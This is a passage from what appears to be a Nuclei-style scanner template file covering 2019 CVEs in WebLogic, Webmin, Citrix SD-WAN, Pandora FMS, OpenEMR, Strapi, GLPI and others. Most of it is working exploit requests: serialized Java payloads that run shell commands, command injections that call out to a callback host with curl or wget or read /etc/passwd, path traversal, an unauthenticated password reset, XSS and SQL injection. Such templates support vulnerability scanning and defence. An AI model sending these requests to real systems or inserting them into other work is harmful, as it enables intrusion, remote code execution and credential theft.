ABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}COP-9272-9102-EVC|revconnectionHandlertrue]]>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\nxxxxoracle.toplink.internal.sessions.UnitOfWorkChangeSet-84-19051151140231069711897461171161051084676105110107101100729711510483101116-40108-4190-107-35423020012011401710697118974611711610510846729711510483101116-7068-123-107-106-72-735230012011211912000166364000002115114058991111094611511711046111114103469711297991041014612097108971104610511011610111411097108461201151081169946116114971204684101109112108971161011157310911210898779-63110-84-855130673013951051101001011101167811710998101114730149511611497110115108101116731101001011209101095981211161019911110010111511603919166910695991089711511511601891761069711897471089711010347671089711511559760595110971091011160187610697118974710897110103478311611410511010359760179511111711611211711680114111112101114116105101115116022761069711897471171161051084780114111112101114116105101115591201120000-1-1-1-11171140391916675-32521103103-37552001201120002117114029166-84-1323-86884-32200120112008-82-54-2-70-6600050099100303470977037703810161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015-8332-109-13-111-35-176210660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151019831161179884114971101151081011168097121108111971001012731101101011146710897115115101115105376121115111115101114105971084711297121108111971001154711711610510847719710010310111611536831161179884114971101151081011168097121108111971005910911611497110115102111114109101144076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977599176991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122971161051111107297110100108101114594186108100111991171091011101161045769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699476879775910810497110100108101114115106691769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910106912099101112116105111110115703910-904076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977597699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145941861081051161011149711611111410537699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459107104971101001081011141065769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910108311111711499101701051081011012719710010310111611546106971189712010011704010511211151111151011141059710847112971211081119710011547117116105108477197100103101116115368311611798841149711011510810111680971211081119710010649911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699471141171101161051091014765981151161149799116841149711011510810111610201069711897471051114783101114105971081051229798108101105799111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994784114971101151081011166912099101112116105111110103112111511111510111410597108471129712110811197100115471171161051084771971001031011161151086099108105110105116621018106971189747105111477010510810187114105116101114704210221069711897471089711010347831161141051101036611710210210111470441004503410161069711897471089711010347841041141019710070471013991171141141011101168410411410197100102040417610697118974710897110103478410411410197100591204905010048051102110310111667111110116101120116671089711511576111971001011141025404176106971189747108971101034767108971151157611197100101114591205305410048055101478057102110697118974710897110103476710897115115761119710010111470591011103101116821011151111171149910110344076106971189747108971101034783116114105110103594176106971189747110101116478582765912061062100600631012106971189747110101116478582767065107103101116809711610410204041761069711897471089711010347831161141051101035912067068100660691069711211210111010010444076106971189747108971101034783116114105110103594176106971189747108971101034783116114105110103661171021021011145912071072100450731017464647464647102971181059911111046105991118075108116111831161141051101031207706810045078102140761069711897471089711010347831161141051101035941861201008010043081101610697118974710897110103478311611410511010370831010861171081101011149798108101808510084081101410697118974710511147871141051161011147088104240761069711897471089711010347671049711483101113117101110991015941761069711897471051114787114105116101114591207109010089091105102108117115104120930111008909410138311697991077797112849798108101103012111511111510111410597108478011911010111451575652505148504850525153485110327612111511111510111410597108478011911010111451575652505148504850525153485159033020301040102605060107000208040101001101012000470101000542-7301-79000201300060100041014000120100050150980001019020020120006300030001-79000201300060100046014000320300010150980000010210220100010230240202500040102601019027020120007300040001-790002013000601000500140004204000101509800000102102201000102802902000103003103025000401026080410110101200081060200060-8903176-6904389-6904589-73046-72052-740561858-74064-74070-740741876-74074-74079-73082-69084891886-73087-74092-74095-7900010960003013020320002033017000100102035016091171130126011001-44-54-2-70-6600050027100302170237024702510161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015113-26105-1860109712410660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151037011111110127311011010111467108971151151011151037761211151111151011141059710847112971211081119710011547117116105108477197100103101116115367011111159101083111117114991017010510810110127197100103101116115461069711897120100117026103512111511111510111410597108471129712110811197100115471171161051084771971001031011161153670111111101610697118974710897110103477998106101991161020106971189747105111478310111410597108105122979810810110311211151111151011141059710847112971211081119710011547117116105108477197100103101116115033020301040102605060107000208010101001101012000470101000542-7301-79000201300060100054014000120100050150180002019000202001700010010202201609112116048011911011411211910120115125000102910697118971204612010910846116114971101151021111141094684101109112108971161011151201140231069711897461089711010346114101102108101991164680114111120121-3139-3832-521667-53201760110411603776106971189747108971101034711410110210810199116477311011811199971161051111107297110100108101114591201121151140501151171104611410110210810199116469711011011111697116105111110466511011011111697116105111110731101181119997116105111110729711010010810111485-54-111521-53126-912027601210910110998101114869710811710111511601576106971189747117116105108477797112597604116121112101116017761069711897471089711010347671089711511559120112115114017106971189746117116105108467297115104779711257-38-63-612296-47302700101081119710070979911611111473091161041141011151041111081001201126364000001211980001600011160810253975397544856113012608120118114029106971189712046120109108461161149711011510211111410946841011091121089711610111500000000000120112120\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Citrix SD-WAN\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"Citrix SD-WAN\")"],"condition":"and"}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\noracle.toplink.internal.sessions.UnitOfWorkChangeSet-84-19051151140231069711897461171161051084676105110107101100729711510483101116-40108-4190-107-35423020012011401710697118974611711610510846729711510483101116-7068-123-107-106-72-735230012011211912000166364000002115114058991111094611511711046111114103469711297991041014612097108971104610511011610111411097108461201151081169946116114971204684101109112108971161011157310911210898779-63110-84-855130973013951051101001011101167811710998101114730149511611497110115108101116731101001011209002195117115101831011141181059910111577101991049711010511510976025959799991011151156912011610111411097108831161211081011151041011011161160187610697118974710897110103478311611410511010359760119597117120671089711511510111511605976991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947114117110116105109101477297115104116979810810159910109598121116101991111001011151160391916691069599108971151151160189176106971189747108971101034767108971151155976059511097109101113012604760179511111711611211711680114111112101114116105101115116022761069711897471171161051084780114111112101114116105101115591201120000-1-1-1-1011603971081081121171140391916675-32521103103-37552001201120002117114029166-84-1323-86884-32200120112001429-54-2-70-66000500-70100303470-727037703810161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015-8332-109-13-111-35-176210660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151019831161179884114971101151081011168097121108111971001012731101101011146710897115115101115105376121115111115101114105971084711297121108111971001154711711610510847719710010310111611536831161179884114971101151081011168097121108111971005910911611497110115102111114109101144076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977599176991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122971161051111107297110100108101114594186108100111991171091011101161045769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699476879775910810497110100108101114115106691769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910106912099101112116105111110115703910-904076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977597699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145941861081051161011149711611111410537699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459107104971101001081011141065769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910108311111711499101701051081011012719710010310111611546106971189712010011704010511211151111151011141059710847112971211081119710011547117116105108477197100103101116115368311611798841149711011510810111680971211081119710010649911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699471141171101161051091014765981151161149799116841149711011510810111610201069711897471051114783101114105971081051229798108101105799111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994784114971101151081011166912099101112116105111110103112111511111510111410597108471129712110811197100115471171161051084771971001031011161151086099108105110105116621016106971189747108971101034784104114101971007042101399117114114101110116841041141019710010204041761069711897471089711010347841041141019710059120440451004304610271191019810811110310599471191111141074769120101991171161018410411410197100704810141031011166711711411410111011687111114107102940417611910198108111103105994711911111410747871111141076510097112116101114591205005110049052104411910198108111103105994711510111411810810111647105110116101114110971084783101114118108101116821011131171011151167310911210870541039910910080561091031011167210197100101114103840761069711897471089711010347831161141051101035941761069711897471089711010347831161141051101035912058059100550601011103101116821011151121111101151011049404176119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011168210111511211111011510173109112108591206206310055064103716675806610451191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111682101115112111110115101731091121087068102011510111667104971149799116101114691109911110010511010310214076106971189747108971101034783116114105110103594186120700711006907210221031011168310111411810810111679117116112117116831161141019710910534041761191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111679117116112117116831161141019710973109112108591207407510069076103511910198108111103105994712010910847117116105108478311611410511010373110112117116831161141019710970781022106971189747108971101034783116114105110103661171021021011147080100810341069711211210111010010444076106971189747108971101034783116114105110103594176106971189747108971101034783116114105110103661171021021011145912083084100810851053258321310808710811611183116114105110103102040417610697118974710897110103478311611410511010359120890901008109112010071100790931049119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011167911711611211711683116114101971097310911210870951011119114105116101831161141019710910244076106971189747105111477311011211711683116114101971095941861209709810096099105102108117115104120101011100960102107111115461109710910180104101610697118974710897110103478312111511610110970106101110310111680114111112101114116121120108059100107010910161069711897471089711010347831161141051101037011110111161117611111910111467971151011201130901001120114103119105110801161089911111011697105110115102740761069711897471089711010347671049711483101113117101110991015941901201180119100112012010171069711897471089711010347821171101161051091017012210101031011168211711011610510910110214041761069711897471089711010347821171101161051091015912012401251001230126107991091003247993280-12810410112010199103940761069711897471089711010347831161141051101035941761069711897471089711010347801141119910111511559120-1260-1251001230-12410114798105110471151043245993280-12210221069711897471051114766117102102101114101100821019710010111470-120102510697118974710511147731101121171168311611410197109821019710010111470-11810171069711897471089711010347801141119910111511570-116101410310111673110112117116831161141019710910234041761069711897471051114773110112117116831161141019710959120-1140-113100-1150-11210424076106971189747105111477311011211711683116114101971095976106971189747108971101034783116114105110103594186120100-110100-1170-10910194076106971189747105111478210197100101114594186120100-107100-1190-10610080-1041081141019710076105110101120-102090100-1190-10110910310111687114105116101114102340417610697118974710511147801141051101168711410511610111459120-990-98100690-97101910697118974710511147801141051101168711410511610111470-95105119114105116101120-93071100-940-9210191069711897471089711010347691209910111211610511111070-901031111171161021761069711897471051114780114105110116831161141019710959120-880-87901070-861019106971189747108971101034784104114111119979810810170-84100-8309110191069711897471051114780114105110116831161141019710970-81107112114105110116108110120-79071100-800-781015112114105110116831169799107841149799101120-76011100-830-751013831169799107779711284979810810110291211151111151011141059710847801191101011145253525156514952505556575750103176121115111115101114105971084780119110101114525352515651495250555657575059033020301040102605060107000208040101001101012000470101000542-7301-79000201300060100047014000120100050150-710001019020020120006300030001-79000201300060100052014000320300010150-710000010210220100010230240202500040102601019027020120007300040001-79000201300060100056014000420400010150-710000010210220100010280290200010300310302500040102608041011010120011140701100118-8903176-72047-64049-74053-640551857-7406177-72047-64049-74053-64055-7406578451867-7407345-74077584254-6907989-6908189-7308244-740861888-74086-74092-73094-740100254-74010318105-7201105852551-91016255-74011518117-740121-10206-89033-720127-6908189-7308218-127-7408644-74086-74092-740-123586-89030-720127-6908189-7308218-121-7408644-74086-74092-740-123586-690-11989-690-11789256-740-1111867-730-108-730-105587158818-103589-89025-6908189-73082259-74086258-74086-74092589257-740-100895881-90-1-3145-740-96259-740-91-890245810-780-852510-740-82-740-772510-740-74-8903-79010940-70-40-89010-7300070093-10109060570112706970967011200229-402670-115-203270-119701127011221-102306057011270697096701120170-8920020320002033017000100102035016091171130126013001-44-54-2-70-6600050027100302170237024702510161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015113-26105-1860109712410660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151037011111110127311011010111467108971151151011151037761211151111151011141059710847112971211081119710011547117116105108477197100103101116115367011111159101083111117114991017010510810110127197100103101116115461069711897120100117026103512111511111510111410597108471129712110811197100115471171161051084771971001031011161153670111111101610697118974710897110103477998106101991161020106971189747105111478310111410597108105122979810810110311211151111151011141059710847112971211081119710011547117116105108477197100103101116115033020301040102605060107000208010101001101012000470101000542-7301-79000201300060100060014000120100050150180002019000202001700010010202201609112116048011911011411211910120115125000102910697118971204612010910846116114971101151021111141094684101109112108971161011151201140231069711897461089711010346114101102108101991164680114111120121-3139-3832-521667-53201760110411603776106971189747108971101034711410110210810199116477311011811199971161051111107297110100108101114591201121151140501151171104611410110210810199116469711011011111697116105111110466511011011111697116105111110731101181119997116105111110729711010010810111485-54-111521-53126-912027601210910110998101114869710811710111511601576106971189747117116105108477797112597604116121112101116017761069711897471089711010347671089711511559120112115114017106971189746117116105108467297115104779711257-38-63-612296-47302700101081119710070979911611111473091161041141011151041111081001201126364000001211980001600011160810253975397544856113012609120118114029106971189712046120109108461161149711011510211111410946841011091121089711610111500000000000120112120\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\nxxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExecidconnectionHandlertrue\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock 